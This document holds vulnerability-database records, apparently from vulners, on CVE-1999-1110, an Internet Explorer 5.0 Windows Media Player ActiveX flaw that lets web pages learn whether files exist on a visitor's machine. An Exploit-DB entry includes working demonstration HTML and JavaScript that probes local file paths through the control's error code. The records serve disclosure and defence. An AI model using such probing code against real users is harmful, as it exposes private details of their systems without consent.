{"type": "osvdb", "published": "1999-11-14T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:7904", "bulletinFamily": "software", "cvss": {"vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/", "score": 5.0}, "viewCount": 1, "edition": 1, "reporter": "OSVDB", "title": "Microsoft Windows Media Player ActiveX File Existance Disclosure", "affectedSoftware": [], "enchantments": {"score": {"value": 6.0, "vector": "NONE", "modified": "2017-04-28T13:20:02", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-1999-1110"]}, {"type": "exploitdb", "idList": ["EDB-ID:19618"]}], "modified": "2017-04-28T13:20:02", "rev": 2}, "vulnersScore": 6.0}, "references": [], "id": "OSVDB:7904", "lastseen": "2017-04-28T13:20:02", "cvelist": ["CVE-1999-1110"], "modified": "1999-11-14T00:00:00", "description": "# No description provided by the source\n\n## References:\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/1999-q3/1632.html\nISS X-Force ID: 7800\n[CVE-1999-1110](https://vulners.com/cve/CVE-1999-1110)\nBugtraq ID: 793\n", "immutableFields": []}

{"cve": [{"lastseen": "2021-02-02T05:19:01", "description": "Windows Media Player ActiveX object as used in Internet Explorer 5.0 returns a specific error code when a file does not exist, which allows remote malicious web sites to determine the existence of files on the client.", "edition": 4, "cvss3": {}, "published": "1999-11-14T05:00:00", "title": "CVE-1999-1110", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-1999-1110"], "modified": "2008-09-05T20:18:00", "cpe": ["cpe:/a:microsoft:ie:5.0"], "id": "CVE-1999-1110", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-1110", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:microsoft:ie:5.0:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2016-02-02T12:16:26", "description": "MS IE 5.0 Media Player ActiveX Error Message Vulnerability. CVE-1999-1110 . Remote exploit for windows platform", "published": "1999-11-14T00:00:00", "type": "exploitdb", "title": "Microsoft Internet Explorer 5.0 Media Player ActiveX Error Message Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-1999-1110"], "modified": "1999-11-14T00:00:00", "id": "EDB-ID:19618", "href": "https://www.exploit-db.com/exploits/19618/", "sourceData": "Microsoft Internet Explorer 5.0 for Windows 2000/Windows 95/Windows 98/Windows NT 4 Media Player ActiveX Error Message Vulnerability\r\n\r\nsource: http://www.securityfocus.com/bid/793/info\r\n\r\nThe Windows Media Player ActiveX control, shipped with IE 5, returns a specific error code if it is instructed to load a local file that does not exist. In this way, an attacker could determine whether or not a specified file on the victim's host exists. This could be used to determine user names and other facets of system configuration.\r\n\r\nDemonstration code:\r\n<object id=\"wm\" WIDTH=0 HEIGHT=0\r\nclassid=\"clsid:22D6F312-B0F6-11D0-94AB-0080C74C7E95\"\r\n>\r\n</object>\r\n<SCRIPT>\r\n// -2147220970\r\nfunction checkfile()\r\n{\r\nb=document.all.wm;\r\nb.FileName=document.forms[0].elements[0].value;\r\nif (b.ErrorCode == -2147220970)\r\nalert(\"File does not exist\")\r\nelse\r\nalert(\"File exists\");\r\n}\r\n</SCRIPT>\r\n<FORM>\r\n<INPUT TYPE=\"TEXT\" VALUE=\"C:\\AUTOEXEC.BAT\" SIZE=60>\r\n<INPUT TYPE=\"SUBMIT\" VALUE=\"Check file\" onclick=\"checkfile()\">\r\n</FORM> ", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/19618/"}]}